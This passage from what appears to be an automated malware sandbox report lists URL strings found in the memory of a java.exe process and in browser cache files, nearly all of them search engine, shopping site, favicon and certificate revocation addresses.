        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
        Source: java.exe, 00000002.00000002.257518296.0000000016740000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
        Source: 1.cache[1].js.8.drString found in binary or memory: http://truste.com/go.htm?dcme
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
        Source: get[1].js.8.drString found in binary or memory: http://watchdog.truste.com/pvr.php?page=complaint
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
        Source: java.exe, 00000002.00000002.257518296.0000000016740000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
        Source: get[1].js.8.drString found in binary or memory: http://www.aboutads.info/consumers
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
        Source: msapplication.xml.7.drString found in binary or memory: http://www.amazon.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
        Source: java.exe, 00000002.00000002.253018092.000000000A5C8000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
        Source: msapplication.xml1.7.drString found in binary or memory: http://www.google.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
        Source: msapplication.xml2.7.drString found in binary or memory: http://www.live.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
        Source: msapplication.xml3.7.drString found in binary or memory: http://www.nytimes.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
        Source: msapplication.xml4.7.drString found in binary or memory: http://www.reddit.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
